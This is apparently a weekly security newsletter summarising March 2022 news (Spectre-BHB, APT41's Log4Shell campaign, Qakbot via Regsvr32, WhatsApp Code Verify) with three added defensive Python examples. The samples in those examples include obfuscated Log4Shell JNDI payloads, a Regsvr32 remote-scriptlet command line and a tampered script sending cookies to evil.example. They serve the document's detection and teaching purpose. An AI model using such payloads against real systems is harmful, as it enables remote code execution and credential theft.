Researchers have disclosed a new technique that bypasses the hardware mitigations for Spectre-V2 (branch target injection) built into modern Intel and Arm CPUs, namely Intel's eIBRS and Arm's CSV2. Called Branch History Injection (Spectre-BHB), the method is a “neat end-to-end exploit” that leaks arbitrary kernel memory on affected processors.
Spectre, originally disclosed in January 2018, refers to a class of security vulnerabilities that stem from a performance feature of modern CPUs called speculative execution: when execution reaches a conditional branch, the CPU predicts which path the program will take and begins executing instructions along that path before the outcome is known.
If the prediction turns out to be wrong, the architectural results of the speculatively executed instructions are discarded, but their side effects on the CPU caches are not. Spectre abuses this: it steers speculation into code that touches memory depending on a secret, then recovers the secret by timing cache accesses, using the cache as a side channel.
“The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel,” the researchers explained.
“However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more ‘interesting’ kernel targets (i.e., gadgets) that leak data,” the Systems and Network Security Group at Vrije Universiteit Amsterdam added.
Spectre-BHB affects all Intel and Arm processors that were previously vulnerable to Spectre-V2, and a number of AMD chipsets were also found to need fixes as part of the same disclosure, prompting the three companies to release software updates to remediate the issue.
What’s trending in security?
🔐 Russia announced that it’s moving to establish its own domestic certificate authority after crippling sanctions from Western governments and companies have prevented renewal of Transport Layer Security (TLS) certificates (web browsers warn users away from sites whose certificates have expired). The development has raised concerns that it could equip the government to intercept internet traffic and stage man-in-the-middle attacks, since a state-controlled CA that users are told to trust can issue a valid-looking certificate for any domain. [The Hacker News]
🛡️ In one of the biggest cybersecurity deals in years, Google said that it has signed a definitive agreement to buy threat intelligence and incident response firm Mandiant for $5.4 billion and integrate it into its cloud computing business. The acquisition is the second largest deal made by Google to date after its doomed takeover of Motorola. [The Hacker News]
🚩 As firmware persistence increasingly becomes a standard part of the big-game APT toolkit, researchers disclosed 16 new flaws in HP UEFI firmware that could be exploited to deploy persistent malware that can bypass security systems. [The Hacker News]
❌ APT41, a prolific and technically advanced hacking collective backed by the Chinese government that has been responsible for a number of attacks in the more than 10 years it has been active, compromised the computer systems of at least six U.S. state governments. The group broke in through vulnerable internet-facing web applications, using Log4Shell and a zero-day flaw in USAHERDS, then carried out extensive reconnaissance and credential harvesting before dropping malware implants on the compromised hosts.
The exact goals of the campaign against state governments “remain unknown,” but what’s obvious is that the nation-state actor moved to exploit the Log4j flaw “within hours” of it becoming public knowledge in December 2021. The persistent and targeted attacks were first detected in May 2021, with the group re-compromising victims, in some cases, even after their initial attack was contained. “APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability,” Mandiant researchers said. [The Hacker News / WIRED / WSJ]
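Operationalizing Log4Shell “within hours” means the scanning and exploitation attempts land in ordinary web server logs. The following is an added example written for this page, not code from Mandiant or from any of the reports cited: a small log scanner that URL-decodes each line, collapses the nested-lookup tricks attackers use to hide the `${jndi:...}` string (`${lower:j}`, `${::-j}` and friends), and then reports which lines carry a JNDI lookup and over which protocol. Only the lookups commonly used for obfuscation are modelled; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic): line 1 is benign, lines 2-4
# carry JNDI lookups (plain, nested-lookup obfuscated, URL-encoded), and line 5
# contains a non-JNDI Log4j lookup that must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2022:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Mar/2022:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.12 - - [10/Mar/2022:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.5:1389/b}"
203.0.113.13 - - [10/Mar/2022:12:00:04 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Armi%3A%2F%2F198.51.100.5%3A1099%2Fc%7D HTTP/1.1" 200 42 "-" "curl/7.81.0"
203.0.113.14 - - [10/Mar/2022:12:00:05 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.81.0"
"""

# An innermost ${...} lookup: no nested braces or '$' inside.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(expr: str) -> str:
    """Rewrite one innermost Log4j lookup to the text the attacker means it to become.

    Assumption: only the lookups used for obfuscation are modelled (this is not a
    full Log4j implementation): ${lower:x}, ${upper:x}, and the ${name:-default}
    fallback, of which ${::-x} is the degenerate form.
    """
    _, sep, default = expr.partition(":-")
    if sep:                       # ${::-j} -> j, ${env:NOPE:-j} -> j
        return default
    kind, sep, arg = expr.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return expr                   # any other lookup: drop the braces, keep the text


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups inside-out until the text is stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


# Protocols a JNDI lookup can reach out over.
_JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)


def find_jndi(lines):
    """Return (line_number, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((lineno, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for lineno, proto in find_jndi(SAMPLE_LOG.splitlines()):
        print(f"line {lineno}: JNDI lookup over {proto}")
```

Normalizing before matching is the important step: a regex for the literal string `${jndi:` misses lines 3 and 4 entirely, while the resolved text of both reads `jndi:...` like line 2. Line 5 shows the scanner is specific to JNDI rather than to any `${...}` lookup, which keeps benign uses of Log4j substitution out of the alert queue.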
🔌 Three critical security vulnerabilities, collectively called TLStorm, in widely used smart uninterruptible power supply (UPS) devices could allow for remote takeover. The risk for widespread disruption and damage in both the cyber and physical worlds is high if the vulnerabilities are exploited, the researchers said. [The Hacker News]
⚠️ The U.S. Treasury Department’s Financial Crimes Enforcement Network (FinCEN) warned U.S. financial institutions this week to keep an eye out for attempts to evade sanctions and U.S.-imposed restrictions following Russia’s invasion of Ukraine. FinCEN said it’s critical to “identify and quickly report suspicious activity associated with potential sanctions evasion, and conduct appropriate risk-based customer due diligence or, where required, enhanced due diligence.” [FinCEN]
🚨 The U.S. Securities and Exchange Commission (SEC) has proposed rule amendments to require publicly traded companies to report data breaches and other cybersecurity incidents within four business days after they’re determined as being a material incident. The development comes after the U.S. Senate unanimously passed the “Strengthening American Cybersecurity Act” that would require entities that experience a cyber incident to report the attacks within 72 hours to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), in addition to alerting the agency about ransomware payments within 24 hours. [SEC / The Hacker News]
⚡ Amid Russia’s attacks on Ukraine, advanced persistent threat (APT) groups affiliated with or backing the country are ramping up phishing and DDoS attacks against Ukrainian and European targets in cyberspace. Also in the mix are two Chinese nation-state groups, APT31 and Mustang Panda, which have unleashed a flurry of phishing activity aimed at Ukraine and Europe. [The Hacker News]
💎 The LAPSUS$ extortionist gang, which recently struck NVIDIA, has now gone after more companies, including Samsung, Mercado Libre, Ubisoft, and Vodafone. The group’s modus operandi is a little unusual: rather than deploying ransomware, where a victim’s data is stolen and then encrypted and a ransom is demanded for its return, LAPSUS$ focuses on data theft and extortion alone. [The Hacker News / Bleeping Computer / The Verge / CNBC]
⚖️ The U.S. Justice Department (DoJ) extradited two suspected ransomware operators belonging to two different cybercrime gangs: Yaroslav Vasinskyi, extradited from Poland for his alleged role in REvil attacks, and Sebastien Vachon-Desjardins, extradited from Canada for his alleged role in NetWalker attacks, both accused of perpetrating file-encrypting malware attacks against dozens of entities. These extraditions are part of a string of successes that law enforcement authorities have had in recent months against criminal actors. [The Hacker News / DoJ]
🌡️ Specialized healthcare and IoT devices from 100 different manufacturers have been rendered vulnerable by a new set of seven security flaws, called Access:7, in a third-party remote management tool called PTC Axeda, once again bringing to the fore the risks of an interconnected software ecosystem and underscoring the need to secure the supply chain. Three of the seven vulnerabilities are rated critical, and the other four are medium- to high-severity bugs. [The Hacker News / Forescout]
📧 The email-borne malware Qakbot (aka Qbot) has a tendency to spread itself by inserting malicious replies into the middle of existing email conversations, using the compromised accounts of other victims. These interjections take the form of a reply-all message containing a short sentence and a link to download a ZIP file holding a malicious Office document, which in turn deploys the malware, capable of executing commands retrieved from an attacker-controlled domain. In a related development, trojans such as Qbot and Lokibot are increasingly being dropped by means of a Windows living-off-the-land binary (LOLBin) known as Regsvr32, launched from decoy Microsoft Office documents. [Sophos / Uptycs]
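The Regsvr32 technique is attractive to attackers precisely because the binary is signed by Microsoft and present on every Windows host, so the detection has to rest on context rather than on the binary itself. Below is an added example, not code from Sophos, Uptycs or the malware authors, showing the kind of rule a detection engineer would write over process-creation telemetry: flag regsvr32.exe when its parent is an Office application, when it registers a module from a user-writable directory, or (a related and well-known abuse beyond what the item above describes) when its `/i:` switch points at a remote scriptlet. The event shape, field names and sample events are constructed assumptions modelled on Sysmon Event ID 1.

```python
import re
from dataclasses import dataclass

# Office hosts whose documents serve as the decoy; regsvr32.exe should not be
# their child under normal use.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Directories an unprivileged user can write to, where a dropped .dll/.ocx lands.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+|appdata|temp|programdata|public)\\", re.IGNORECASE)
# regsvr32's /i: switch fetching a remote scriptlet (the "Squiblydoo" technique).
REMOTE_SCRIPTLET = re.compile(r"/i:\s*\"?https?://", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed shape, after Sysmon Event ID 1)."""
    pid: int
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def regsvr32_findings(ev: ProcEvent) -> list[str]:
    """Reasons this event looks like regsvr32 abuse; empty list if none."""
    if _basename(ev.image) != "regsvr32.exe":
        return []
    reasons = []
    if _basename(ev.parent_image) in OFFICE_HOSTS:
        reasons.append("spawned by an Office application")
    if REMOTE_SCRIPTLET.search(ev.command_line):
        reasons.append("loads a remote scriptlet via /i:")
    if USER_WRITABLE.search(ev.command_line):
        reasons.append("registers a module from a user-writable path")
    return reasons


def scan(events):
    """Map pid -> reasons for every event that trips at least one rule."""
    return {ev.pid: r for ev in events if (r := regsvr32_findings(ev))}


# Constructed telemetry (not taken from the reports cited above).
SAMPLE_EVENTS = [
    # Decoy document: Word spawns regsvr32 on an .ocx dropped under the user's profile.
    ProcEvent(4120, r"C:\Windows\System32\regsvr32.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'regsvr32.exe /s "C:\Users\bob\AppData\Local\Temp\invoice.ocx"'),
    # Remote scriptlet execution; nothing is written to disk.
    ProcEvent(4188, r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\explorer.exe",
              r"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"),
    # Legitimate installer registering a COM DLL from Program Files: must not alert.
    ProcEvent(4201, r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\msiexec.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    # Office child that is not regsvr32: outside this rule's scope.
    ProcEvent(4230, r"C:\Windows\System32\cmd.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", r"cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

The third event is the one to watch when tuning: software installers register COM components through regsvr32 all day, so a rule keyed on the image name alone would drown in noise. Anchoring on the parent process and on the module's location keeps the rule quiet for installers while still catching the decoy-document chain.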
📝 BazarBackdoor, the stealthy malware created by Wizard Spider, the operators of the now-shuttered TrickBot botnet, is now being distributed by means of website contact forms rather than typical phishing emails to evade detection by security software. [Abnormal Security]
🌍 The European Parliament voted to create a new “committee of inquiry” to investigate allegations that European member states acquired and used the powerful Pegasus mobile spyware. The Parliament said the committee “is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers.” [European Parliament]
💬 Meta Platforms’ WhatsApp and Cloudflare have banded together for a new browser extension called Code Verify to validate the authenticity of the messaging service’s web app served to web browsers, and ensure that the application has not been tampered with or altered. Code Verify is built on the idea of subresource integrity – where browsers verify the integrity of a fetched file – but applies the principle to all resources on the webpage, and leverages Cloudflare as a trusted third party. [The Hacker News]
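The core of an integrity check like the one described above is simple to state: the publisher pins a digest of every resource in a manifest, and the client recomputes the digest of what it actually received and refuses to trust anything that differs or was never pinned. The following is an added example written for this page, not Code Verify's own code nor WhatsApp's or Cloudflare's: it produces integrity strings in the browser's SRI format (`sha384-<base64>`), accepts several space-separated tokens as SRI does, and reports tampered, missing and injected resources. The manifest and resource bytes are constructed.

```python
import base64
import hashlib
import hmac

SUPPORTED = {"sha256", "sha384", "sha512"}   # the digest algorithms SRI permits


def sri_digest(data: bytes, algo: str = "sha384") -> str:
    """Integrity string in SRI form, e.g. 'sha384-<base64 digest>'."""
    if algo not in SUPPORTED:
        raise ValueError(f"unsupported algorithm {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def matches(data: bytes, integrity: str) -> bool:
    """True if data matches any of the space-separated 'algo-b64' tokens.

    Like the browser's SRI check, several tokens may be listed and any one match
    passes. Comparison is constant-time so timing leaks nothing about the digest.
    """
    for token in integrity.split():
        algo, sep, _ = token.partition("-")
        if sep and algo in SUPPORTED and hmac.compare_digest(sri_digest(data, algo), token):
            return True
    return False


def verify(manifest: dict[str, str], served: dict[str, bytes]) -> dict[str, str]:
    """Compare what the server delivered against the pinned manifest.

    Returns path -> problem for every discrepancy; an empty dict means the page
    is exactly what the publisher signed off on.
    """
    problems = {}
    for path, integrity in manifest.items():
        if path not in served:
            problems[path] = "missing"
        elif not matches(served[path], integrity):
            problems[path] = "hash mismatch"
    for path in served.keys() - manifest.keys():
        problems[path] = "not in manifest"      # an injected resource
    return problems


# Constructed example (not WhatsApp's real files): the publisher's build pins
# digests of the original resources ...
ORIGINAL = {
    "/app.js": b"console.log('hello from the real app');",
    "/vendor.js": b"export const build = 42;",
}
MANIFEST = {path: sri_digest(data) for path, data in ORIGINAL.items()}

# ... and the client later checks what it actually received: here one file has
# been tampered with and one resource was never part of the build.
SERVED = {
    "/app.js": ORIGINAL["/app.js"],
    "/vendor.js": b"export const build = 42; fetch('https://evil.example/k?' + document.cookie);",
    "/extra.js": b"// injected",
}

if __name__ == "__main__":
    for path, problem in verify(MANIFEST, SERVED).items():
        print(f"{path}: {problem}")
```

Two points carry over to the real system. First, checking only the resources the page names is not enough: the `"not in manifest"` branch is what catches a script that was added rather than modified, which plain per-tag SRI would never see. Second, the manifest is only as trustworthy as the channel it arrives over, which is why the design above hands it to a party independent of the server that serves the app.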
🔊 A new working exploit has been devised to commandeer Amazon Echo smart speakers and force them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. It does require proximity, though, at least to set the attack up: an attacker within range can issue a voice command instructing the speaker to pair with an attacker-controlled Bluetooth device, after which the speaker’s own voice output can be used to feed it further commands. [Ars Technica]
💲 An anonymous Ukrainian security researcher turned the tables on the notorious Conti ransomware gang by leaking a trove of the group’s internal information. Needless to say, the leaks have offered an unprecedented insight into Conti’s inner workings. But the group doesn’t appear to be fazed. “Conti cyber-threat actors remain active and reported Conti ransomware attacks against US and international organizations have risen to more than 1,000,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said, releasing a list of 100 domain names used by the ransomware group. [The Record / Check Point Research / Cyberint / Rapid7 / BreachQuest / Krebs on Security / CISA]
⛽ Threat actors reportedly gained access in mid-February to computers belonging to current and former employees at nearly two dozen major natural gas suppliers and exporters, including Chevron, Cheniere Energy, and Kinder Morgan, with the access offered for sale on the dark web to the highest bidder. [Bloomberg]
📵 Information stealers are being distributed through links embedded in the descriptions of YouTube videos that purport to offer cheats for the popular game Valorant. Clicking the link downloads an executable that, once run, collects “basic information of the infected system as well as various user credentials such as screenshots, user account credentials saved to web browsers and VPN client programs, cryptocurrency wallet files, Discord tokens, and Telegram session files.” [ASEC]
💵 The Ragnar Locker ransomware gang has so far infected at least 52 critical infrastructure organizations in the U.S. across sectors including manufacturing, energy, financial services, government, and information technology, according to a U.S. Federal Bureau of Investigation (FBI) alert. [FBI]
🪷 Vietnamese financial services firms are being targeted with an updated variant of a backdoor known as PHOREAL (aka RIZZO), malware known to be used exclusively by APT32 (aka OceanLotus). [Elastic Security]
🗄️ The past week in data breaches, leaks, and ransomware: Adafruit, Bridgestone, PressReader, Rompetrol, Rostec, and Triolan.
Tips, Comments, Ideas?
Send them my way by replying to this email.
Thanks again for reading. See you in the next edition!